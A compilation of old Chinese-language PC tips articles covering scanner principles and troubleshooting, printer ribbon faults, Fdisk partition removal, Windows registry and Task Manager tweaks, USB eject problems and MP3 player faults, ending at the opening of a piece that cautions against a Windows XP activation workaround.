     打开扫描仪电源后，若发现Ready（准备）灯不亮，先检查扫描仪内部灯管。若发现内部灯管是亮的，可能与室温有关，解决的办法是让扫描仪通电半小时后关闭扫描仪，一分钟后再打开它，问题即可迎刃而解。若此时扫描仪仍然不能工作，则先关闭扫描仪，断开扫描仪与电脑之间的连线，将SCSI ID的值设置成7，大约一分钟后再把扫描仪打开。在冬季气温较低时，最好在使用前先预热几分钟，这样就可避免开机后Ready灯不亮的现象。

扫描出来的画面颜色模糊

     首先通过观察法看看扫描仪上的平板玻璃是否脏了，如果是的话请将玻璃用干净的布或纸擦干净，注意不要用酒精之类的液体来擦，那样会使扫描出来的图像呈现彩虹色。如果不是玻璃的问题，请检查扫描仪使用的分辨率是多少，如300dpi的扫描仪扫1200dpi以上的影像会比较模糊。因为300dpi的扫描仪扫1200dpi相当于将一点放至四倍大。另外，请检查显示器设置是否为16bit色或以上。如果是扫描一些印刷品，有一定的网纹造成的模糊是可以理解的，处理方法可以用扫描仪本身自带的软件，也可以用Photoshop等图像软件加以处理。

输出图像色彩不够艳丽

     这也属于软件故障，可以先调节显示器的亮度、对比度和Gamma值。Gamma值是人眼从暗色调到亮色调的一种感觉曲线。Gamma值越高，感觉色彩的层次就越丰富。我们可以对Gamma值进行调整。当然，为了求得较好的效果，你也可以在Photoshop等软件中对Gamma值进行调整，但这属于“事后调整”，我们可以根据扫好的照片的具体情况进行Gamma值的调整。在扫描仪自带的软件中，如果是普通用途，Gamma值通常设为1.4；若是用于印刷，则设为1.8;网页上的照片则设为2.2。还有就是扫描仪在使用前应该进行色彩校正，否则就极可能使扫描的图像失真；此外还可以对扫描仪驱动程序对话框中的亮度/对比度选项进行具体调节。

     扫描仪的问题通常出自扫描效果，这往往也是软件故障之一，不同的扫描仪对这些软件故障有不同的解决办法，可以利用相关软件进行修正。而硬件故障方面主要是接口、线路问题，只要大家连接好线路、设置好端口，用最新的驱动程序，这些问题应该是容易解决的。


扫描仪的工作原理、性能及应用（二）

《一键清理系统垃圾》

扫描仪的工作原理、性能及应用（二）

3.什么是色彩分辨率？

    色彩分辨率又叫色彩深度、色彩模式、色彩位或色阶，总之都是表示扫描仪分辨彩色或灰度细腻程度的指标，它的单位是bit（位）。

    色彩位确切的含义是用多少个位来表示扫描得到的一个像素。例如:1bit只能表示黑白像素，因为计算机中的数字使用二进制，1bit只能表示两个值（21=2）即0和1，它们分别代表黑与白。8bit可以表示256个灰度级（28=256），它们代表从黑到白的不同灰度等级。24bit可以表示16777216种色彩（224=16777216），其中红（R）绿（G）蓝（B）各个通道分别占用8bit，它们各有2^8=256个等级，一般称24bit以上的色彩为真彩色，当然还有采用30bit、36bit、42bit的机种。

    从理论上讲，色彩位数越多，颜色就越逼真，但对于非专业用户来讲，由于受到计算机处理能力和输出打印机分辨率的限制，追求高色彩位给我们带来的只会是浪费。

    4.什么是TWAIN？

    TWAIN（Technology Without An Interesting Name）是扫描仪厂商共同遵循的规格，是应用程序与影像捕捉设备间的标准接口。只要是支持TWAIN的驱动程序，就可以启动符合这种规格的扫描仪。

    例如在Microsoft Word中就可以启动扫描仪，方法是打开菜单栏的“插入”→“图片”→“来自扫描仪”。利用Adobe Photoshop也可以做到这一点，方法是打开“File”→“Import”→“Select TWAIN_32 Source”。

    5.什么是接口方式？

    接口方式（连接界面）是指扫描仪与计算机之间采用的接口类型。常用的有USB接口、SCSI接口和并行打印机接口。SCSI接口的传输速度最快，而采用并行打印机接口则更简便。

    三、扫描仪的应用

    1.选择原稿类型

    扫描仪驱动程序的用户界面会提供扫描原稿类型的选择菜单。“文件”适用于白纸黑字的原稿，扫描仪会按照1个位来表示黑与白两种像素，这样会节省磁盘空间。“杂志和书籍”则适用于既有图片又有文字的图文混排稿样，扫描该类型兼顾文字和具有多个灰度等级的图片。“照片”适用于扫描彩色照片，它要对红绿蓝三个通道进行多等级的采样和存储。

    进行适当的选择可以在满足要求的情况下节省磁盘空间，不同的扫描仪，可能会提供不同的原稿类型选择。

    2.分辨率与文件大小

    一般的扫描应用软件都可以在你预览原始稿样时自动计算出文件大小，但了解文件大小的计算方法更有助于你在管理扫描文件和确定扫描分辨率时作出适当的选择。

    二值图像文件的计算公式是：水平尺寸×垂直尺寸×（扫描分辨率）2/8。彩色图像文件的计算公式是：水平尺寸×垂直尺寸×（扫描分辨率）2×3。例如用彩色RGB方式扫描一幅普通彩色照片（3R 3.5×5英寸），扫描分辨率为300DPI，那么得到的图像文件长度为5×3.5×3002×3=4725000字节即4.7MB（这个计算公式假设每一种颜色的色深是8位并且没有考虑图片的存储时的压缩算法，实际文件大小会因保存文件的格式差异与使用的色深有很大的不同）。

    3.选择扫描分辨率

    扫描分辨率=放大系数×打印分辨率/N (N为打印机喷头色数)。

    扫描分辨率越高得到的图像越清晰，但是考虑到如果超过输出设备的分辨率，再清晰的图像也不可能打印出来，仅仅是多占用了磁盘空间，没有实际的价值。因此选择适当的扫描分辨率就很有必要。

    4.使用OCR软件

    OCR是字符识别软件的简称，它是英文Optical character recognition的缩写，原意是光学字符识别。它的功能是通过扫描仪等光学输入设备读取印刷品上的文字图像信息，利用模式识别的算法，分析文字的形态特征从而判别不同的汉字。

    中文OCR一般只适合于识别印刷体汉字。使用扫描仪加OCR可以部分地代替键盘输入汉字的功能，是省力快捷的文字输入方法。


扫描仪的工作原理、性能及应用（一）

《一键清理系统垃圾》

扫描仪的工作原理、性能及应用（一）

扫描仪是除键盘和鼠标之外被广泛应用于计算机的输入设备。你可以利用扫描仪输入照片建立自己的电子影集；输入各种图片建立自己的网站；扫描手写信函再用E-mail发送出去以代替传真机；还可以利用扫描仪配合OCR软件输入报纸或书籍的内容，免除键盘输入汉字的辛苦。所有这些为我们展示了扫描仪不凡功能，它使我们在办公、学习和娱乐等各个方面提高效率并增进乐趣。

    在选购扫描仪时，我们常常遇到许多难懂的专业技术名词，如光学分辨率（光学解析度）、最大分辨率（最大解析度）、色彩分辨率（色彩深度）、扫描模式、接口方式（连接界面）等等。

    在使用扫描仪当中，又会遇到到扫描速度慢，占用硬盘空间多，以及一些不知所云的设置等诸多困扰。然而说明书提供给我们的操作指导并不能让所有的人成为应用专家，即使照着说明书去进行某些设置，也不知道为什么要这样做，这无疑给我们用好用巧机器带来了障碍。

    本文针对这些问题，从扫描仪的基本结构入手，阐述它的工作原理，使我们对每一项设置或操作都道原因，在应用水平上有一个提高。

    一、扫描仪的工作原理

    扫描仪是图像信号输入设备。它对原稿进行光学扫描，然后将光学图像传送到光电转换器中变为模拟电信号，又将模拟电信号变换成为数字电信号，最后通过计算机接口送至计算机中。

    扫描仪扫描图像的步骤是:首先将欲扫描的原稿正面朝下铺在扫描仪的玻璃板上，原稿可以是文字稿件或者图纸照片；然后启动扫描仪驱动程序后，安装在扫描仪内部的可移动光源开始扫描原稿。为了均匀照亮稿件，扫描仪光源为长条形，并沿y方向扫过整个原稿；照射到原稿上的光线经反射后穿过一个很窄的缝隙，形成沿x方向的光带，又经过一组反光镜，由光学透镜聚焦并进入分光镜，经过棱镜和红绿蓝三色滤色镜得到的RGB三条彩色光带分别照到各自的CCD上，CCD将RGB光带转变为模拟电子信号，此信号又被A/D变换器转变为数字电子信号。

    至此，反映原稿图像的光信号转变为计算机能够接受的二进制数字电子信号，最后通过串行或者并行等接口送至计算机。扫描仪每扫一行就得到原稿x方向一行的图像信息，随着沿y方向的移动，在计算机内部逐步形成原稿的全图。

    在扫描仪获取图像的过程中，有两个元件起到关键作用。一个是CCD，它将光信号转换成为电信号；另一个是A/D变换器，它将模拟电信号变为数字电信号。这两个元件的性能直接影响扫描仪的整体性能指标，同时也关系到我们选购和使用扫描仪时如何正确理解和处理某些参数及设置。
1.什么是CCD？

    CCD是Charge Couple Device的缩写，称为电荷耦合器件，它是利用微电子技术制成的表面光电器件，可以实现光电转换功能。

    CCD在摄像机、数码相机和扫描仪中应用广泛，只不过摄像机中使用的是点阵CCD，即包括x、y两个方向用于摄取平面图像，而扫描仪中使用的是线性CCD，它只有x一个方向，y方向扫描由扫描仪的机械装置来完成。

    CCD芯片上有许多光敏单元，它们可以将不同的光线转换成不同的电荷，从而形成对应原稿光图像的电荷图像。如果我们想增加图像的分辨率，就必须增加CCD上的光敏单元数量。实际上，CCD的性能决定了扫描仪的x方向的光学分辨率。

    2.什么是A/D变换器？

    A/D变换器是将模拟量（Analog）转变为数字量（Digital）的半导体元件。从CCD获取的电信号是对应于图像明暗的模拟信号，就是说图像由暗到亮的变化可以用从低到高的不同电平来表示，它们是连续变化的，即所谓模拟量。

    A/D变换器的工作是将模拟量数字化，例如将0至1V的线性电压变化表示为0至9的10个等级的方法是：0至小于0.1V的所有电压都变换为数字0、0.1至小于0.2V的所有电压都变换为数字1……0.9至小于1.0V的所有电压都变换为数字9。实际上，A/D变换器能够表示的范围远远大于10，通常是2^8=256、2^10=1024或者2^12=4096。

    如果扫描仪说明书上标明的灰度等级是10bit，则说明这个扫描仪能够将图像分成1024个灰度等级，如果标明色彩深度为30bit，则说明红、绿、蓝各个通道都有1024个等级。显然，该等级数越高，表现的彩色越丰富。

    二、扫描仪的性能

    扫描仪按种类可以分为手持扫描仪，台式扫描仪和滚筒式扫描仪（鼓形扫描仪）。价格方面，手持型在400～600元左右；台式机从1000至上万元不等；鼓形扫描仪的分辨率在8000dpi以上，动态范围，彩色位数等指标都较高，价格也不适合于一般家庭和办公室。

    扫描仪的主要性能指标有x、y方向的分辨率、色彩分辨率（色彩位数）、扫描幅面和接口方式等。各类扫描仪都标明了它的光学分辨率和最大分辨率。分辨率的单位是dpi，dpi是英文Dot Per Inch的缩写，意思是每英寸的像素点数。

    1.什么是光学分辨率？

    光学分辨率是指扫描仪的光学系统可以采集的实际信息量，也就是扫描仪的感光元件——CCD的分辨率。例如最大扫描范围为216mm×297mm（适合于A4纸）的扫描仪可扫描的最大宽度为8.5英寸（216mm），它的CCD含有5100个单元，其光学分辨率为5100点/8.5英寸=600dpi。常见的光学分辨率有300×600、600×1200、1000×2000或者更高。

    2.什么是最大分辨率？

    最大分辨率又叫做内插分辨率，它是在相邻像素之间求出颜色或者灰度的平均值从而增加像素数的办法。内插算法增加了像素数，但不能增添真正的图像细节，因此，我们应更重视光学分辨率。


扫描仪的维护

《一键清理系统垃圾》

扫描仪的维护

    扫描仪是一种光机电一体化的产品，用于捕获影像（照片、文字页、图形和插画等），并将之转换为电脑可以揭示、编辑、储存和输入的数位格式，是继键盘和鼠标之后的第三代主要的电脑输入设备。

    扫描仪刚投放市场时曾因其过高的价格而使人望而却步，然而随着扫描技术的不断改进和发展，以及扫描仪价格的日趋大众化，扫描仪正逐步成为计算机不可缺少的外设产品之一。作为光学、机械、电子、软件应用等技术紧密结合的高科技产品，它为家庭、办公、娱乐提供了新的融洽亲情的方式，有人形象地将之比喻为计算机的“眼睛”。然而我们怎样才能更好的保护“眼睛”呢？下面就是答案。

    保护好光学部件

    扫描仪在扫描图像的过程中，通过一个叫光电转换器的部件把模拟信号转换成数字信号，然后再送到计算机中的。这个光电转换设置非常精致，光学镜头或者反射镜头的位置对扫描的质量有很大的影响。因此我们在工作的过程中，不要随便地改动这些光学装置的位置，同时要尽量避免对扫描仪的震动或者倾斜。

    遇到扫描仪出现故障时，不要擅自拆修，一定要送到厂家或者指定的维修站去；另外大部分扫描仪，如图中的Acer的绿旋风1200（5100U），都带有安全锁，在运送扫描仪时，一定要把扫描仪背面的安全锁锁上，以避免改变光学配件的位置。

    定期做保洁工作

    扫描仪可以说是一种比较精致的设备，我们平时一定要认真做好保洁工作。扫描仪中的玻璃平板以及反光镜片、镜头，如果落上灰尘或者其他一些杂质，会使扫描仪的反射光线变弱，从而影响图片的扫描质量。为此，我们一定要在无尘或者灰尘尽量少的环境下使用扫描仪，用完以后，一定要用防尘罩把扫描仪遮盖起来，以防止更多的灰尘来侵袭。当长时间不使用时，我们还要定期地对其进行清洁。

    我们在做好扫描仪的维护工作的同时，如果希望得到比较好的扫描图像质量，最好能掌握一定的扫描技巧。因为使用同样一台扫描仪，扫描同样一幅图像，有的人扫描出来的图像质量很好，而有的人扫描出来的图像既缺乏层次，又偏色，与扫描得好的图像相比可能有天壤之别，下面需要的就是一些扫描的技巧。这方面的问题您可以参考本期第22版的文章《扫出缤纷世界》。


扫描仪历险记

《一键清理系统垃圾》

扫描仪历险记

    目前扫描仪的价格越来越便宜，家庭购买已经不是很困难。拥有了扫描仪后可以让自己的电脑功能更加丰富，可以用来制作电子相册，还可以通过OCR来简化大篇文章的录入工作，还可以配合Modem当传真机用。尤其是电子相册对本人有很大的吸引力。经过一番思想斗争，终于决定了购买一款Acer超薄型扫描仪。拥有了它之后，我的电脑生活增添了无穷的乐趣。

    前几天，我有一个非常急的传真要发，于是把文稿放在扫描仪上开始常规操作，但出人意料的是，扫描仪毫无反应。用软件检测，系统中根本没有检测到扫描仪设备！我的操作系统是Windows Me，由Win 98升级安装，原来一直正常使用。反复重新启动、检查电缆、电源多次均未排除故障。后对系统两次重新安装它，仍然像黑包公一样不与理睬。

    首先怀疑扫描仪自身出现了毛病，经过在朋友机器上的测试，发现扫描仪本身没有任何问题。由此说明毛病出在我的电脑系统中。记得Windows Me最近很不稳定，动不动就出现一个系统核心文件没有响应，无法正常关机，只好“硬”关机。之后我对系统进行了多次优化，“超级兔子”软件、“优化大师”软件等都用上了派场，很有可能是把系统的核心设置改坏了。在这种情况下，我决定回复到原来的Win 98系统。

    对重要数据进行一番备份之后，对C盘进行了格式化，安装Win 98时倒也十分顺利，但系统就是对扫描仪有深仇大恨，死活不认扫描仪!另外新的问题也出现了，我的老“猫”也出现了问题 ，安装驱动程序表面是正常的，但拨号时就提示“调制解调器没安装好”，无法上网。同时，电影迷的首选软件RealPlayer也无法播放。

    找来几位电脑高手朋友，除了重装系统、添加新硬件等常规办法之外，对这一系列“天灾”，束手无策。难道只能坐以待毙？不上网等于要了的我性命。还是好好研究说明书吧。在满是尘土的主板说明书中，有两条引起了我的兴趣。其一是“You must install VIA IRQ routing program V1.1 for fixed IRQ routing table mistake on Windows 98.(at \patch\via\Virq9x\setup.exe)”，大意是在光盘上有一个Windows 98系统下关于IRQ方面的补丁必须安装；其二是“For VIA 586B South Bridge Chipset，If user use i740 AGP card，user must install VIA AGP Vxd mini port driver where on the cd title \driver\via\agp\setup.exe”，大意是说，对于VIA 586B“南桥”芯片，如果电脑使用i740 AGP显卡，要安装光盘上一个VIA芯片组的驱动程序。笔者用的正是这种显卡，赶快找来VIA的4合1驱动包安装。

    电脑重新启动后，扫描仪第一个“听话”了，能正常扫描图片!接着老“猫”也能拨号，听着“猫”叫，不亚于听到自己小孩的笑声，同时RealPlayer播放电影碟也开始流畅无比。系统一切恢复正常。

    回过头想想，记得刚装扫描仪时曾经也作过如此安装，只不过由别人代劳的，印象不深了。前一个补丁是解决了电脑硬件在“温酒吧”系统中IRQ的冲突问题，第二个补丁是解决了i740显卡在系统中的显示问题。

    可见，系统安装盘和所有硬件说明书包括主板所带的光盘在关键时刻，它的作用不可低估(尤其是VIA芯片组的主板）。所以请购买新机的朋友，千万要以笔者此事为教训，不要乱丢这些珍贵的说明书和相应光盘。万一系统出点什么毛病，好从容不迫地对付。


色带的故障及解决办法

《一键清理系统垃圾》

色带的故障及解决办法

    在使用针式打印机时，最常见的就是色带故障，下面介绍和解决几种打印机色带故障。

1、色带断裂

色带的拉力过大，拉断缝合线或字锤打烂色带导致色带断裂。前一种情况可将断裂部分剪掉，重新缝合好；后一种情况只要更换色带即可。

2、色带被卡

色带的边缘脱丝、起毛后容易缠住色带轮，导致色带轮被卡，色带不能正常缩回色带盒。解决方法是：首先打开打印机盖，将色带转臂与锤排联锁手柄打开，在色带盒的送带端将色带轻轻拉回，然后合上色带转臂与锤排联锁手柄，打开电源，机子在自检后色带就会被装回色带盒。

3、霍尔效应器损坏

色带频繁的卡带，霍尔效应器不断受到挤压，进而造成损坏断裂。这种故障只能更换色带转臂总成或用色带运动传感器替代。

4、色带主动轮驱动带磨损或断裂

这种故障是由于驱动带使用时间过长或字符链摩擦驱动带引起的。解决方法是，调整字符链的位置，使其不再摩擦驱动带；已断裂的，请更换。

5、色带运动传感信号中断

先检查色带运动传感信号线是否已经损坏，若断裂请更换信号线；再检查一下互锁转换板上J6插座处的色带运动传感信号线是否损坏或接触不好，请更换或插好信号线。


删除NTFS分区

《一键清理系统垃圾》

删除NTFS分区

1、用 Win 98启动盘启动系统，运行Fdisk，在Fdisk主菜单中选择第3项“Delete partition or Logical Drive”，在下一屏幕中选择第4项“Delete Non-DOS Partition”(删除非DOS分区)。
2、此时可以看到第一项中显示的是NTFS格式分区(Fdisk将它认成Non-DOS分区)，将它删除。
3、重启电脑，运行Fdisk，在Fdisk主菜单中选择第1项，把刚删除非DOS分区腾出的空间全部建成主DOS分区。按ESC退回后，再将刚建立的主DOS分区设置为活动分区。
4、格式化C盘后，即可重装Win 98。

    另外：如果你有Win 2000安装盘，还可以用Win 2000来删除NTFS分区。放入Win 2000安装盘，然后将系统设置为从光盘启动。启动后开始安装Win 2000。在选择安装的分区以及分区的格式时，选择是NTFS格式的分区，并更改分区格式为FAT32。更改完毕后，就可以重新启动系统，格式化C盘并安装Win 98。


删除屏幕保护和壁纸

《一键清理系统垃圾》

删除屏幕保护和壁纸

    问：我使用的是Windows 98和Windows 2000双操作系统，里面有很多不满意的屏幕保护和壁纸。我想请教一下，用什么办法可以删除它们？

    答：Windows 98默认的屏幕保护都在C:\Windows下，文件后缀名是.scr，该目录下有一些壁纸，后缀名是.bmp。另外C:\Windows\Web\Wallpaper中也有部分壁纸。Windows 2000默认的屏幕保护都在C:\Winnt\System32\下，后缀名也是.scr。壁纸在C:\Winnt\Web\Wallpaper\和C:\Documents and Settings\账户名\My Documents\My Pictures\下。在这些路径下找到不满意的文件后即可删除。


删除“添加/删除程序”中的无效信息

《一键清理系统垃圾》

删除“添加/删除程序”中的无效信息

    问：我使用的是Windows 98系统。由于我从硬盘上重装了两次系统，现在打开“控制面板”中的“添加/删除程序”时，过去删除过的程序名又显示在添加/删除列表框中了，而且无法删除。请问我该怎么办？

    答：系统中“添加/删除程序”里面的信息全部储存于注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall下面，打开注册表编辑器，找到不需要软件的卸载信息，删除对应的子项即可。

       要想清除这些顽固的软件名，可以打开注册表编辑器，进入HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion项，找到Uninstall项，从这里可以找到那些残留的软件列表，将之删除即可。假如“添加或删除程序”列表中的程序名仍然留在那里，可以在注册表编辑器中通过“编辑→查找”将与该程序有关的相应键值全部删除，不过在操作之前请备份注册表和重要的数据文件哟。


删除系统备份文件

《一键清理系统垃圾》

删除系统备份文件

开始→运行，*敲入：sfc.exe /purgecache 然后回车即可


删除信使服务

《一键清理系统垃圾》

删除信使服务

    问：我的电脑安装的是Windows 2000。最近在上网时老是会跳出一个窗口，标题栏上显示是信使服务，内容经常是些广告，用系统信息中的正在运行的任务查看是c:\windows\system32\mmc.exe这个程序在运行，但是删除掉这个程序不到一分钟，它又出来了，也就是一直删不掉，不知道这个问题怎么解决？

    答：这是Windows 2000里面自带的信使服务。打开“我的电脑”，点击“控制面板”，双击“管理工具”后点“服务”选项，找到Messenger，双击打开Messenger属性，把启动类型设置为手动，然后点击停止按钮，最后点击确定就可以关闭这个服务了。


删除隐藏不活动的图标

《一键清理系统垃圾》

删除隐藏不活动的图标

我们在Windows XP中使用程序时，大部分程序在使用当中会有一个活动图标显示在任务栏“时间显示”的右侧（系统托盘区）。而在任务栏属性中的通知区域里，有一个叫“隐藏不活动的图标”选项，如果勾选了该项，那么系统就会自动记录曾经在系统托盘区显示过程序活动图标。点击该选项的“自定义”按钮，就会在“过去的项目”一栏中看到很多历史记录。
要删除这些内容也很简单，在“开始→运行”中键入regedit，打开注册表编辑器，展开“HKEY_CURRENT_US ER\Software\Microsoft\Windows\Curr entVersion\Explorer\TrayNotify”分支，其中“IconStreams”和“PastIconStream”项中分别存储着“当前项目”和“过去的项目”，将“TrayNotify”项删除，按Ctrl+Alt+Del组合键调出“Windows任务管理器”，单击进程选项卡，选择explorer.exe，结束进程。之后在“Windows任务管理器”中选“文件”→“新建任务”，在“创建新任务”中输入explorer.exe即可。


闪存式MP3的常见故障及处理方法

《一键清理系统垃圾》

闪存式MP3的常见故障及处理方法

    闪存式MP3（指具备MP3播放功能的闪存）的价格相对较低，因此它的用户数量众多。我们在使用它的过程中难免会遇到故障，如果是产品自身的严重故障，还是要交给经销商或厂家来处理。但是一些小的故障，自己解决会节约很多时间。下面介绍一下笔者所遇到过的一些问题，也许对大家有所帮助：

    一、不能开机

    可能的故障原因有：

    1.电池没有电。

    2.电池放置的时候正、负两极颠倒，这种情况应立即解决，长时间地颠倒正、负两极会对MP3内部电路造成损害。

    3.有杂物隔在按钮与电路板之间。这种情况，在清除杂物的时候要注意，小心不要损坏电路板上很小的一些元件，而且要注意产品的保修期。切忌将外壳强行打开，这样有可能损坏外壳，既影响美观，又使内部元件失去保护。

    二、开机后自动关机

    可能的故障原因有：

    1.电压、电流问题。因为闪存式MP3一般使用7号电池，而笔者观察有的产品说明书根本没有说明正常使用所需要的电压。恰恰7号电池有1.2V和1.5V两种。如果使用1.2V电池，开机时瞬间电流强度可以满足开机要求，但是几秒之后电流将变小，这就会造成开机后自动关机。由于大多数人使用充电电池（一般是1.2V的），所以建议大家要先了解自己的闪存式MP3在工作时有没有电压、电流问题，注意选购电池的种类（购买的非充电电池大多数是1.5V的）。有良好稳定的电压、电流作保障，可以延长机器的使用寿命。

    2.内部电路短路。建议对这种情况，大家不要自己处理。因为闪存式MP3内部的元件很小，电路板制作紧密，如果不慎损坏了存储器或电路就难以补救了。还是交给厂商去处理吧。

    3.内部文件过多：笔者曾经就遇到过这样的问题，在电池电量充足的情况下，由于存储器没有一点空间，就出现了开机后，自动关机的现象，删除一两个文件后恢复正常。笔者认为留一点空间，对播放器的稳定工作有好处。

    三、播放一首歌曲完毕后停止播放

    可能的故障原因有：

    1.单个音乐文件损坏。将闪存式MP3与PC相连接重新拷贝音乐文件或直接删除该音乐文件。

    2.格式问题。查看说明书，查看闪存式MP3中存放的是否为所支持的格式。目前有的闪存式MP3支持多种音乐格式，但是笔者还是认为存放单一格式的音乐文件比存放多种音乐格式的要稳定得多。

    3.闪存问题。由于长期添加和删除文件，闪存会出现碎片，建议重新格式化闪存。


闪盘无法卸载究竟为什么

《一键清理系统垃圾》

闪盘无法卸载究竟为什么

    相信你一定经常遇到这种情况：在电脑的USB接口插入闪存使用完毕后，按照常规的操作点击任务栏右下角“拔下或弹出硬件”，接着点击“停止USB Mass Storage Device-驱动器”后，没有出现“USB Mass Storage Device设备现在可安全地从系统卸载”对话框，而是出现了另一个对话框“现在无法停止通用卷设备，请稍候再停止设备”。经过检查，闪存里的程序文件都已关闭，电脑和闪存之间也没有任何数据传输。无法安全卸载设备是没有道理的啊！

    那么到底是因为什么导致硬件无法拔出呢?笔者仔细思考了这个问题。想来想去，猜测闪存插入时在Windows任务管理器中应该会增加一个与之相对应的进程，硬件正常拔出时这个对应的进程自动结束，当这个进程不能正常结束时硬件也就无法正常拔出了。为了验证这个猜想，笔者先打开任务管理器，进入“进程”一栏，注意到左下角显示的是：“进程数：23”，再插入闪存，然后把目光集中到“进程数”上，可是，当系统找到硬件，一切显示正常之后，进程数并没有像笔者想像的那样变为24，而是保持23不变。这样看来，闪存插入时并没有与之相对应的进程数，那么这个现象就不好解释了。

    正当我无奈地点击托盘图标，想卸载闪存时，突然发现当点击"停止USB驱动器"后进程数变成了24，也就是说卸载硬件要由一个进程“负责”，当硬件卸载后，这个进程也同时结束。经过多次试验，发现这个进程的名称是rundll32.exe，哈哈，原来是这个熟悉的链接程序。

    到底有没有某一个进程和无法卸载硬件有关呢?笔者恰好又碰到了一次"无法停止设备"的机会，就打开任务管理器的进程栏，依次试验，每结束一个看起来相关的进程，就试验看能否拔出硬件。结束了几个无用的进程后，发现有3个相同的rundll32.exe进程同时存在，把这几个进程都结束时，笔者发现，硬件可以正常删除了。真是功夫不负有心人，看来症结还在rundll32.exe上。通过这次研究，笔者总结出：可移动硬件无法正常卸载时，进程栏中必定还有没有结束的rundll32.exe（当然，有的rundll32.exe可能和系统中正在运行的程序有关），把这几个rundll32.exe进程结束，可移动设备就肯定能正常卸载了。

    小提示

    如果经常出现这种无法停止设备的现象，可以建立一个批处理文件，里面输入“taskkill /im rundll32.exe”，保存为delusb.bat，出现故障时运行一下就可以了。这种方法适用于Windows XP用户，如果是Windows 9x/2000的用户，可以到这里下载。


设置窗口自动刷新

《一键清理系统垃圾》

设置窗口自动刷新

    Windows的“资源管理器”或“我的电脑”是我们用来管理和修改电脑资源的两个主要工具。有时我们利用这两个工具对有关信息进行修改之后，系统不会自动将修改结果显示出来，必须按下F5键或点击菜单栏的“查看→刷新”，用手工刷新才能使修改生效，虽然步骤不多但还是显得有些麻烦。怎样才能使屏幕自动刷新呢？只要采用下面的方法对注册表简单修改一下就行：

    点击“开始→运行”，在对话框中输入“regedit”启动注册表编辑器，展开HKEY_LOCAL_MACHINE\System\Currentcontrolset\Control\Update分支。

    如果我们的操作系统是Windows 2000/XP，我们就能在该分支下看到一个名为“UpdateMode”的DWORD值，它就是用于设置是否自动刷新窗口显示的，系统默认值为1，表示手工刷新，该值若为0则表示自动刷新。我们只要用鼠标右键单击“UpdateMode”，在出现的快捷菜单中选“修改”并将其值修改为“0”即可；如果我们的操作系统是Windows 98/Me，则在展开的注册表分支下看到的“UpdateMode”是一个二进制值，系统默认值为01表示手工刷新，该值若为00则表示自动刷新，我们只要将其值修改为“00”即可。修改方法为，右键单击“UpdateMode”，在出现的快捷菜单中选“修改”后会出现“编辑二进制值”对话框，只要将该对话框中“数值数据”栏的“0000 01”的数值改为“0000 00”即可。

    这样我们就完成了对窗口自动刷新功能的控制，此后，我们利用“资源管理器”或“我的电脑”对系统相关信息进行的修改就能自动刷新显示。


设置开始菜单中的用户名

《一键清理系统垃圾》

设置开始菜单中的用户名

    一、恢复“开始”菜单中的“用户名”
    因为修改了注册表或者通过组策略进行了相关的设置，可以将Windows XP“开始”菜单中的“用户名”删除。如果遇到这种情况，我们可以通过下面的方法来恢复：

    在“开始→运行”中键入“Regedit”打开“注册表编辑器”，展开分支“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer”，接着在右侧的窗口中将“NoUserNameInStartMenu”值(DWORD值)设为“0”或者删除它。注销或重新启动计算机后，在“开始”菜单中就可以看到“用户名”了。

    二、恢复“开始”菜单中的“我的图片”
    在Windows XP“开始”菜单的用户名旁边，一般会显示“我的图片”，但是在应用了某些设置后，该图片就会消失，我们可以通过下面的方法来恢复：

    单击“开始→控制面板”，双击“用户账户”，在出现的“用户账户”窗口中单击“更改用户登录或注销的方式”，接着选中“使用欢迎屏幕”复选框，最后单击“应用选项”按钮。在注销或重新启动计算机后，在“开始”菜单中就可以看到“我的图片”了。

    三、隐藏欢迎屏幕中的“用户名”
    为了防止别人通过欢迎屏幕中的用户名非法登录Windows XP，我们可以这样隐藏用户名：

    打开“注册表编辑器”，展开分支“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList”，接着在右侧的窗口中找到要隐藏的用户名(如果没有，就新建一个)，并将它的值(DWORD值)设为“0”(设为“1”就表示显示用户名)。注销或重新启动计算机后，欢迎屏幕中就会隐藏该“用户名”了。


设置任务管理器

《一键清理系统垃圾》

设置任务管理器

    1.总体个性化设置
    ①显示方式
    选择“选项→前端显示”，可以让窗口总是在最前端显示；选择“选项→最小化时隐藏”，则任务管理器最小化时将显示在系统托盘内。
    ②显示速度
    选择“查看→更新速度”，可以对信息刷新速度进行设置，其中“高”表示一秒刷新两次；“标准”表示两秒刷新一次；“低”表示四秒刷新一次；“暂停”表示不自动刷新。
    2.选项卡的个性化设置
    ①“应用程序”选项卡
    在此选项卡中可以根据个人喜好设置视图查看方式，如“大图标”。
    ②“进程”选项卡
    在此选项卡中点击“查看→选择列”可以对要显示的列进行设置。单击列标题可以对显示的进程进行排序。右击任一个进程(“System Idle Process”除外)，选择“设置优先级”就可以设置进程的优先级。
    ③“性能”选项卡
    在该选项卡中点击“查看→显示内核时间”可以显示内核的运行情况(红线标示)；双击该选项卡就会进入详细视图，再次双击即可回复(该方法同样适于其他选项卡)。
    ④“联网”选项卡
    只有当系统安装有网卡时，才会显示“网络”选项卡。通过“选项→显示累积数据”可以显示所有通过网络适配器传递的数据；通过“查看→网卡历史记录”可以查看发送、接收以及总共的字节数。通过“查看→选择列”可以设置显示选项。
    ⑤“用户”选项卡
    只有在计算机启用了“快速用户切换”功能(通过“控制面板→用户账户→更改用户登录或注销的方式”中勾选“使用快速用户切换”)，并且作为工作组成员或独立的计算机时，才会出现“用户”选项卡，而对于作为网络域成员的计算机，“用户”选项卡不可用。我们可以通过“查看→选择列”设置要显示的信息。选中某个用户，通过“发送消息”可以给此用户发消息。


慎用还原Wpa.dbl文件来达到使WindowsXP永远激活的目的

《一键清理系统垃圾》

慎用还原Wpa.dbl文件来达到使WindowsXP永远激活的目的

2002-02-20　　　 作者：

WinXP新增的激活功能很是讨厌。我想没有人会反对这个观点的。于是就有人提出备份WindowsXP的激活文件来达到永远激活WinXP的目的而不需要重新上网/打电话激活了。接着就有人说明了这个文件就是Wpa.dbl,没错，WindowsXP就是这个验证这个文件来确定你的WindowsXP是否需要激活/重新激活。但是经过我的一番实践，发现这个方法有欠妥之处。
